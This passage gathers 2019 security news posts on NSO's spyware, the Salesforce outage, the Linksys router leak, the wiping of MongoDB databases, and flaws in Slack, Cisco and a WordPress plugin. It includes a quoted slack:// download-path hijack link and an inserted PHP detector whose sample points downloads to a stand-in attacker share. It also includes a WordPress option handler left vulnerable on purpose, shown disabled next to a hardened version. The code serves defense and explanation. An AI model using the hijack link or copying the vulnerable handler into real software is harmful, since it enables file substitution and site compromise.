“No matter what happens, the Android Community does not have any legal right to block any company from accessing its open-source license,” Eric Xu, rotating chairman of Huawei, told Reuters in March.

Pierluigi Paganini

(SecurityAffairs – Android, Google)

The post Google will block Huawei from using Android and its services appeared first on Security Affairs.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International, and the non-governmental organization fears its staff may be under surveillance by spyware delivered through the WhatsApp issue.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially, the sale of the surveillance software is limited to authorized governments, to support agencies’ investigations of criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trade in surveillance software is out of control.

In August, the human rights group published a report that provides details on the attack against an employee at Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.


The organization added that such attacks are becoming ever more frequent, with Israeli surveillance software increasingly being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabia’s agents, and the country licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology; it prepared a 26-page report in reply to the accusations made by Amnesty and Citizen Lab.

Curiously, in early 2019 a majority stake in NSO was acquired by the London-based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.

Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Hacking the ‘Unhackable’ eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war to rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys expose users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild’ project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker group’s arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

Salesforce faced one of its biggest service disruptions ever

Salesforce is facing a huge outage; it shut down a good portion of its infrastructure after a change to the production environment.

A change in the production environment is the root cause of the broad outage suffered by Salesforce.

The service disruption affected its Pardot B2B marketing automation system: the cloud CRM company’s change broke access-privilege settings across organizations and gave customers access to all of their respective company’s files.

“One of our projects had all its profiles modified to enable modify all, allowing all users access to all data.” reported a user on Reddit.

In response to the incident, Salesforce denied all access to around a hundred cloud instances that host Pardot users, which also blocked access for every other user of the same systems, even those not using Pardot.

Salesforce customers have been unable to access the service since 09:56 PDT (16:56 UTC) on Friday.

“The deployment of a database script resulted in granting users broader data access than intended,” reads a note published by the company. “To protect our customers, we have blocked access to all instances that contain affected customers until we can complete the removal of the inadvertent permissions in the affected customer orgs.”


Below the message published by Patrick Harris, Salesforce CTO and co-founder:

A few hours ago, Salesforce informed its users that it was able to restore access to most of its services, which means that users experienced at least 15 hours of service disruption. Unfortunately, some organizations may still face problems: according to the latest notice issued by the CRM firm, administrators will have to manually repair user account permissions.

“We have restored administrators’ access to all orgs affected by the recent permissions issue and have prepared a set of instructions for admins that may need guidance on how to manually restore user permissions. We have updated the instructions to include guidance for Field Service Lightning administrators.” states the company. “Those instructions can be found in this Known Issue article: http://sfdc.co/PermSetKI. In parallel, we are working on an automated provisioning fix to allow us to restore user permissions to where they were before the incident occurred.”

The company warns that a limited number of admins may still be experiencing issues such as logging in to their organizations or modifying permissions.

Pierluigi Paganini

(SecurityAffairs – Salesforce, outage)

The post Salesforce faced one of its biggest service disruptions ever appeared first on Security Affairs.

Dutch intelligence investigates alleged Huawei ‘backdoor’

Dutch intelligence services are probing Huawei for possibly spying for the Chinese government by using a “back door” in equipment of major telecoms firms.

Dutch intelligence probes Huawei for possibly spying for the Chinese government by using a “back door” in the equipment used by major telecoms firms.

Dutch intelligence shares the concerns raised by other western governments about the risks of involving the Chinese telco giant in the creation of the new 5G mobile phone infrastructure.

Since 2018, the US Government has invited its allies to exclude Huawei equipment from critical infrastructure and 5G architectures.

According to Dutch newspaper De Volkskrant, the probe into Huawei is being led by the Dutch intelligence agency, AIVD.

The newspaper, citing intelligence sources, revealed that Huawei allegedly had access to the data of customers of major telecoms firms in the country, including Vodafone, KPN and T-Mobile. In April, KPN announced a partnership with Huawei to update its 4G networks.

“The report comes at a crucial time in the Netherlands, with Dutch Prime Minister Mark Rutte expected to make an imminent decision on the extent of Huawei’s involvement in the country’s 5G infrastructure.” reported the Telegraph.

AIVD did not comment on the report; its spokesman Hilbert Bredemeijer explained that the spy agency “does not comment on possible individual cases.”


Huawei continues to reject the accusation of cyber espionage, remarking that it is a private company that does not work for the Chinese intelligence apparatus.

“We do not respond to stories based on anonymous sources or speculation. We have been aware of a Task Force led by the NCTV (Ministry of Justice & Security) for some time to investigate the risks involved in the construction and use of 5G. That was previously announced in a letter from Minister Grapperhaus.” a Huawei spokesperson said.

“It is also known that the three major telecom parties are participating in the risk analysis of the vulnerability of 5G telecommunication networks. This involves looking at what measures are needed to minimize risks. We are in favor of taking general measures that can increase the resilience of telecommunications networks and that apply equally to all relevant parties. We look forward to the results of this report with confidence.”

The Dutch probe is part of a dispute between China and the United States over global trade and cyber espionage.

Pierluigi Paganini

(SecurityAffairs – 5G, Dutch intelligence services)

The post Dutch intelligence investigates alleged Huawei ‘backdoor’ appeared first on Security Affairs.

Number of hacktivist attacks declined by 95 percent since 2015

According to a study conducted by IBM, the number of hacktivist attacks that caused quantifiable damage has declined by 95 percent since 2015.

Even though in Italy the cells of the popular Anonymous collective are very active, the overall number of hacktivist attacks that caused quantifiable damage to the victim has declined by 95 percent since 2015.

Researchers analyzed data collected by IBM’s X-Force threat intelligence unit between 2015 and 2019. The collected information shows a drop in hacktivist attacks from 35 in 2015 to only 2 in 2018.


However, IBM experts only collected data on hacktivist attacks that resulted in quantifiable damage.

Most of the hacktivist attacks carried out between 2015 and 2018 were attributed to Anonymous (45%), followed at a distance by Lizard Squad (9%), and DownSec and New World Hackers (4%).


“The “IBM X-Force Threat Intelligence Index 2019” highlighted troubling trends in the cybersecurity landscape, including a rise in vulnerability reporting, cryptojacking attacks and attacks on critical infrastructure organizations.” reads a blog post published by IBM. “Yet amid all the concern, there is one threat trend that our data suggests has been on the decline: hacktivism — the subversive use of internet-connected devices and networks to promote a political or social agenda.”

The experts believe that the decline in the number of attacks carried out by hacktivists is caused by two major factors: a drop in attacks launched by Anonymous, and the intensification of the operations conducted by law enforcement that led to the arrests of hacktivists.

Since 2010, Anonymous has become one of the most active collectives of hacktivists in the world, reaching a peak of activity in early- to mid-2016.

At the time, Anonymous hit several high-profile organizations, but according to IBM the group started to decline “possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus.”

X-Force data shows only eight Anonymous attacks in 2015 and 2016, and only one in 2018.

Arrests and legal warnings targeting hacktivists had an important deterrent effect: according to IBM, law enforcement agencies in the U.S., U.K. and Turkey have arrested at least 62 hacktivists since 2011, and the actual number could be greater.

“Three of the arrested hacktivists received sentences in 2018 and 2019, all with prison time of three years or greater, including one with a 10-year prison sentence.” continues IBM.

The alleged Anonymous member Martin Gottesfeld was accused of launching DDoS attacks against two US healthcare organizations in 2014, Boston Children’s Hospital and the Wayside Youth and Family Support Network.

In January, the hacktivist was sentenced to 121 months in prison, and the judge ordered him to pay nearly $443,000 in damages.

“Where are hacktivist attacks likely to go from here? We are reluctant to say that the era of hacktivism has come to an end. Acute social justice issues, greater organizational capabilities among hacktivist groups and a stronger shift to areas that lay beyond the reach of law enforcement all have the potential to dramatically change the face of hacktivism in a relatively short period of time.” concludes IBM. “More likely than not, we are experiencing a lull in hacktivist activity rather than a conclusion.”

Pierluigi Paganini

(SecurityAffairs – hacktivist attacks, hacking)

The post Number of hacktivist attacks declined by 95 percent since 2015 appeared first on Security Affairs.

Dozens of Linksys router models leak data useful for hackers

Dozens of Linksys router models are affected by a flaw that causes the leak of data that can be used by attackers … and the company won’t fix it.

Security researcher Troy Mursch, Chief Research Officer of Bad Packets, discovered that over 20,000 Linksys wireless routers are leaking full historical records of every device ever connected to them.

The leaked information includes devices’ unique identifiers, names, and operating systems; clearly, these data could be abused by hackers for attacks.

According to Mursch, the root cause of the data leak is a persistent vulnerability that resides in dozens of models of Linksys routers. Unfortunately, the flaw is very easy to exploit, and it is possible.

The devices continue to leak the information even when their firewall is turned on.

The expert used the Binary Edge IoT search engine to find vulnerable devices; earlier this week he discovered 25,617 routers that were leaking a total of 756,565 unique MAC addresses.

The disclosure of the historical records of devices that have connected to a specific router exposes the users to attacks; the knowledge of MAC addresses could be abused by APT groups in targeted attacks, like the recent supply chain attack against ASUS.

The situation could be worse if owners of the routers were using default admin credentials. The issue discovered by the expert, in fact, could be used by attackers to discover if the vulnerable routers are still using default administrative passwords.

Mursch discovered that about 4,000 of the vulnerable devices were still using the default admin credentials. The vulnerable routers have remote access enabled by default, a gift for hackers, who can perform a broad range of malicious activities, such as changing DNS settings and delivering malware.

Mursch reported the flaw to Linksys, but unfortunately, the company closed the issue as “Not applicable / Won’t fix.”

Mursch published the list of vulnerable devices on Pastebin.


If you are using one of the vulnerable devices, you should replace it.

Pierluigi Paganini

(SecurityAffairs – LinkSys, Data leak)

The post Dozens of Linksys router models leak data useful for hackers appeared first on Security Affairs.

Unistellar attackers already wiped over 12,000 MongoDB databases

Unistellar attackers have already wiped roughly 12,000 unsecured MongoDB databases exposed online over the past three.

Every time hackers deleted a MongoDB database they left a message asking the administrators to contact them to restore the data.

Unfortunately, the criminal practice of deleting MongoDB databases and requesting a ransom to restore the data is common; experts have observed several campaigns targeting unsecured archives exposed online.

In the last wave of attacks, crooks don’t request the payment of a specific ransom amount, instead, they provide an email contact to start a negotiation.

Bleeping Computer first reported the attacks and cited the expert Sanyam Jain as the person that discovered the deleted MongoDB databases.

“this person might be charging money in cryptocurrency according to the sensitiveness of the database.” explained Jain.

The expert discovered 12,564 unprotected MongoDB DBs that were wiped by an attacker tracked as Unistellar; he searched for the text “hacked_by_unistellar” that the attacker left in the message.

Making the same search on Shodan, experts at BleepingComputer found a smaller number, 7,656 databases, while doing the same search I found 8,133 compromised installs exposed online.

Given the large number of MongoDB databases deleted by Unistellar, it is likely the attacker has automated its attack chain.


Jain first discovered the attacks on April 24; the note left by the Unistellar attacker reads “Restore ? Contact : unistellar@yandex.com”.

The attacker used two email addresses in these attacks, unistellar@hotmail.com or unistellar@yandex.com.

According to Jain, Unistellar creates restore points to restore the databases after the victims have paid the ransom.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 

Pierluigi Paganini

(SecurityAffairs – Unistellar attacks, MongoDB)

The post Unistellar attackers already wiped over 12,000 MongoDB databases appeared first on Security Affairs.

Facebook banned Archimedes Group, misinformation made in Israel

A new political misinformation campaign was uncovered and blocked by Facebook; this time it was not operated by Russia but by Israel’s Archimedes Group.

Facebook uncovered and blocked a misinformation campaign run by Israel’s Archimedes Group; the company used fake accounts to manipulate political campaigns.

According to Facebook, the Archimedes Group used hundreds of pages, accounts, and groups in the attempt to influence the public sentiment on political discussions.

The misinformation focused on specific countries in Africa (Nigeria, Senegal, Togo, Angola, Niger, and Tunisia), Latin America and Southeast Asia. The operators behind this campaign posed as local people and organizations to fuel the debate on specific political events.

“Today we removed 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia.” wrote Nathaniel Gleicher, Head of cybersecurity Policy at Facebook. “The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement.”

Facebook banned Archimedes Group and all of its subsidiaries from its social media platforms.

Facebook shared some interesting details about the company’s efforts to spread fake news and change the perception of reality:

  • Presence on Facebook and Instagram: 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts.
  • Followers: About 2.8 million accounts followed one or more of these Pages, about 5,500 accounts joined at least one of these Groups and around 920 people followed one or more of these Instagram accounts.
  • Advertising: Around $812,000 in spending for ads on Facebook paid for in Brazilian reals, Israeli shekel, and US dollars. The first ad ran in December 2012 and the most recent ad ran in April 2019.
  • Events: Nine events were hosted by these Pages. The first was scheduled for October 2017 and the most recent was scheduled for May 2019. Up to 2,900 people expressed interest in at least one of these events, and a portion of their accounts were previously identified and disabled as fake. We cannot confirm whether any of these events actually occurred.

Facebook provided an example of the type of content that was removed: an image related to Martin Fayulu, leader of the Engagement for Citizenship and Development party in the Democratic Republic of the Congo.


Archimedes Group invested a total of $812,000 in Facebook ads, a figure that gives an idea of the strategic importance of social networks in misinformation campaigns.

“It has repeatedly violated our misrepresentation and other policies, including by engaging in coordinated inauthentic behavior,” Facebook says. “This organization and all its subsidiaries are now banned from Facebook, and it has been issued a cease and desist letter.”

Now the question is: who paid for this campaign?

Pierluigi Paganini

(SecurityAffairs – Facebook, Archimedes Group)

The post Facebook banned Archimedes Group, misinformation made in Israel appeared first on Security Affairs.

Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

China-linked hackers breached the German software company behind TeamViewer in 2016, the German newspaper Der Spiegel reported.


According to the media outlet, Chinese state-sponsored hackers used the Winnti trojan malware to infect the systems of the company.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially motivated and was mostly involved in cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry, and the majority of the victims are located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted by the hackers in autumn 2016, when its experts detected suspicious activities and quickly blocked them to prevent major damage.

A TeamViewer spokesperson revealed that the company investigated the intrusion attempts but did not find any evidence of exposure of customer data or other sensitive data.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was the target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said the company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

At the time, the company published a statement denying that it had been breached by hackers:

“Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.

Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services.

Security researcher David Wells from Tenable discovered a critical flaw in version 3.3.7 of the Slack desktop app that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that it is possible to use slack:// links to change Slack app settings when clicked, including the PrefSSBFileDownloadPath setting that specifies the location where a user’s files are downloaded. An attacker could use a specially crafted link that, when clicked, changes the targeted user’s download destination to a path specified by the attacker, for example a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”


Wells also discovered that an attacker could manipulate the downloaded file stored in the location they set up.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

An attacker can inject malware into an Office file downloaded by the victim.

The links devised by the expert can be pasted to a Slack channel or a private conversation to which the attacker has access.

But is it possible to post the link into Slack channels that the attacker is not part of?

The expert discovered that an unauthenticated attacker can change the location of downloaded files using RSS feeds. Slack channels, in fact, can subscribe to RSS feeds that populate a channel with site updates, which can contain links.

In this case, the hacker has to trick the victim into clicking on a specially crafted RSS feed link posted online. The download location can be changed even if the attacker does not have access to the victim’s Slack workspace.

“Let’s consider an example with reddit.com, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked.” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to,”
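An added defender-side example, not Tenable’s research code or Slack’s own: a PHP filter for content that is about to be relayed into a channel (for instance the body of an external RSS item) that reports slack://settings links rewriting PrefSSBFileDownloadPath. The function name and the sample feed text are hypothetical and constructed here.

```php
<?php
// Added example: scan text destined for a Slack channel for slack://settings
// links that would change the desktop client's download path, the mechanism
// described in the post. Function name and sample values are constructed.

/**
 * Find slack://settings/?update=... links in $text and report, for each,
 * which setting keys it would change and whether PrefSSBFileDownloadPath
 * is pointed at a UNC path (a remote share, the case that lets whoever
 * controls the share replace the file the user later opens).
 */
function example_find_download_path_links(string $text): array
{
    $findings = [];
    // The link itself may contain braces and quotes, so only whitespace or
    // angle brackets (HTML markup around a feed item) terminate a match.
    if (!preg_match_all('~slack://settings/\?[^\s<>]+~i', $text, $m)) {
        return $findings;
    }
    foreach ($m[0] as $url) {
        // Take the query string directly; the value is not a well-formed URL
        // component once it contains quotes and Windows backslashes.
        $query = substr($url, strpos($url, '?') + 1);
        parse_str($query, $params);                 // percent-decodes the value
        $update = (string) ($params['update'] ?? '');

        // The payload is a JSON-like object using single or double quotes.
        // A regex is used instead of json_decode because unescaped
        // backslashes in a UNC path would make json_decode return null.
        preg_match_all(
            '~[\'"]([A-Za-z0-9_]+)[\'"]\s*:\s*[\'"]([^\'"]*)[\'"]~',
            $update,
            $pairs,
            PREG_SET_ORDER
        );

        $keys = [];
        $path = null;
        foreach ($pairs as $pair) {
            $keys[] = $pair[1];
            if ($pair[1] === 'PrefSSBFileDownloadPath') {
                $path = $pair[2];
            }
        }
        // UNC paths start with \\ (or // after normalisation). As the post
        // notes, Slack filters ':' out of these links, so a local drive root
        // cannot even be expressed; a share path is the realistic target.
        $isRemote = $path !== null
            && (substr($path, 0, 2) === '\\\\' || substr($path, 0, 2) === '//');

        $findings[] = [
            'url'      => $url,
            'keys'     => $keys,
            'path'     => $path,
            'remote'   => $isRemote,
            // Any rewrite of the download path deserves blocking; a remote
            // share is the variant that enables file substitution.
            'severity' => $isRemote ? 'high' : ($path !== null ? 'medium' : 'low'),
        ];
    }
    return $findings;
}

// Constructed sample feed text: a harmless web link, a link that redirects
// downloads to a share, and a link that changes an unrelated setting.
$sample = <<<'TXT'
Read more: https://example.invalid/post
slack://settings/?update={'PrefSSBFileDownloadPath':'\\evil.invalid\share'}
slack://settings/?update={"PrefExampleOther":"1"}
TXT;

foreach (example_find_download_path_links($sample) as $f) {
    printf(
        "%-6s keys=%s path=%s\n",
        $f['severity'],
        implode(',', $f['keys']),
        $f['path'] ?? '(unchanged)'
    );
}
```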

The flaw has been classified as “medium severity” because it requires user interaction. Slack awarded the researcher $500 under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)


Cisco addressed a critical flaw in networks management tool Prime Infrastructure

Cisco has issued security updates to address 57 security flaws, including three in its Prime Infrastructure network management tool.

One of the flaws addressed by Cisco in the Prime Infrastructure management tool could be exploited by an unauthenticated attacker to execute arbitrary code with root privileges on PI devices.

“Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system.” reads the advisory published by Cisco.

“One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface.”

The remaining two issues, tracked as CVE-2019-1822 and CVE-2019-1823, could be exploited by an attacker that has valid credentials to authenticate to the impacted administrative interface.

The flaws affect Cisco Prime Infrastructure Software releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1.

The vulnerabilities were discovered by Steven Seeley of Source Incite.

“These vulnerabilities exist because the software improperly validates user-supplied input,” continues the advisory. “An attacker could exploit these vulnerabilities by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.”

Cisco PSIRT is not aware of any attacks exploiting these flaws in the wild.


A few days ago, Cisco fixed Thrangrycat, a vulnerability tracked as CVE-2019-1649 that affects multiple Cisco products supporting the Trust Anchor module (TAm). The issue could be exploited by an attacker to fully bypass the Trust Anchor module via Field Programmable Gate Array (FPGA) bitstream manipulation.

Pierluigi Paganini

(SecurityAffairs – Cisco Prime infrastructure, hacking)


Stack Overflow Q&A platform announced a data breach

The popular question-and-answer platform for programmers Stack Overflow announced on Thursday that it has suffered a data breach.

A data breach makes the headlines again; this time the victim is the popular question-and-answer platform for programmers, Stack Overflow.

The company announced on Thursday that it has discovered unauthorized access to its production systems over the weekend.

The company immediately launched an investigation. At this time it has not shared technical details about the intrusion; it only revealed that it has found no evidence that customer or user data was compromised.

“Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11.” reads a data breach notification published by Mary Ferguson, VP of Engineering at Stack Overflow. “We discovered and investigated the extent of the access and are addressing all known vulnerabilities,”

Stack Overflow has more than 10 million registered users and it has over 50 million unique visitors every month. The Q&A platform is the most important website of the Stack Exchange Network.


In December 2018, another popular Q&A platform, Quora, revealed that it had suffered a data breach. Unknown hackers breached its systems and accessed the data of 100 million users; the exposed data included names, email addresses and hashed passwords.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)


XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites

A vulnerability in the Live Chat Support plugin for WordPress could be exploited by attackers to inject malicious scripts into websites using it.

Researchers at Sucuri have discovered a stored/persistent cross-site scripting (XSS) vulnerability in the WP Live Chat Support plugin for WordPress.

The flaw could be exploited by remote, unauthenticated attackers to inject malicious scripts into websites running the WordPress CMS with the Live Chat Support plugin; the attacker does not need an account on the affected website.

The plugin, which implements a chat solution for customer engagement and conversion, is estimated to have over 60,000 active installs.

Versions of the plugin prior to 8.0.27 are vulnerable to stored/persistent XSS.

Experts pointed out that the attack can be automated to hit a broad range of victims.

An XSS vulnerability could allow hackers to inject malicious code in websites and compromise visitors’ accounts or expose them to modified page content. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. 

An XSS is persistent when the malicious code is added to a section of the page that is stored on the server. Every time a visitor’s browser loads the page, it parses and executes the malicious code.

The attack vector is an unprotected admin_init hook. Experts discovered that the function wplc_head_basic lacks proper privilege checks while updating the plugin settings.


“It then executes an action hook with even more critical settings,” reads the advisory published by Sucuri. “Since “admin_init” hooks can be called visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker could use these endpoints to arbitrarily update the option “wplc_custom_js”.”

The content of the option is added to every page that loads the live chat support, allowing attackers to inject malicious JavaScript code on multiple pages.
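An added illustrative example, not the WP Live Chat Support plugin’s actual code: the unauthenticated settings-update pattern the advisory describes (an admin_init callback that saves an option without checking who is asking) beside a hardened handler for the same option. Function and form-field names prefixed “example_” are hypothetical; the option name wplc_custom_js is the one named in the advisory.

```php
<?php
// Added example, not the plugin's code: vulnerable and hardened versions of
// an admin_init callback that stores the wplc_custom_js option. Names with
// the "example_" prefix are hypothetical.

// VULNERABLE PATTERN. admin_init also fires for /wp-admin/admin-post.php and
// /wp-admin/admin-ajax.php, which can be requested without being logged in,
// so anyone who can reach the site can overwrite the option.
function example_vulnerable_save_custom_js() {
    if ( isset( $_POST['example_custom_js'] ) ) {
        // No capability check, no nonce: whatever is stored here becomes a
        // persistent script on every page that later prints the option.
        update_option( 'wplc_custom_js', wp_unslash( $_POST['example_custom_js'] ) );
    }
}
// add_action( 'admin_init', 'example_vulnerable_save_custom_js' ); // left disabled

// HARDENED PATTERN. Same hook, but the write is gated on an authenticated
// user with the right capabilities and on a nonce bound to this form.
function example_hardened_save_custom_js() {
    if ( ! isset( $_POST['example_custom_js'] ) ) {
        return;
    }
    // An unauthenticated visitor has no capabilities, so this check alone
    // closes the admin-post.php / admin-ajax.php vector. unfiltered_html is
    // the capability WordPress itself requires before a user may store raw
    // script; manage_options limits the change to administrators.
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
        wp_die( esc_html__( 'You are not allowed to change this setting.', 'example' ), 403 );
    }
    // The nonce ties the request to the plugin's own settings form and
    // rejects cross-site requests riding on an administrator's session.
    check_admin_referer( 'example_save_custom_js', 'example_nonce' );

    update_option( 'wplc_custom_js', wp_unslash( $_POST['example_custom_js'] ) );
}
add_action( 'admin_init', 'example_hardened_save_custom_js' );

// Settings form that the hardened handler expects (nonce field included).
function example_render_settings_form() {
    $js = get_option( 'wplc_custom_js', '' );
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    wp_nonce_field( 'example_save_custom_js', 'example_nonce' );
    echo '<textarea name="example_custom_js">' . esc_textarea( $js ) . '</textarea>';
    submit_button();
    echo '</form>';
}

// Front-end output. The option is script by design, so it cannot be escaped
// on output; the only effective control is restricting who may write it.
function example_print_custom_js() {
    $js = get_option( 'wplc_custom_js', '' );
    if ( '' === $js ) {
        return;
    }
    echo "<script>\n" . $js . "\n</script>\n";
}
add_action( 'wp_footer', 'example_print_custom_js' );
```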

To secure your WordPress install, update the WP Live Chat Support plugin to version 8.0.27.

Below is the timeline of the flaw:

  • April 30, 2019: Initial contact attempt.
  • May 15, 2019: Patch is live.

Pierluigi Paganini

(SecurityAffairs – Live Chat Support, Hacking)



Past, present, and future of the Dark Web

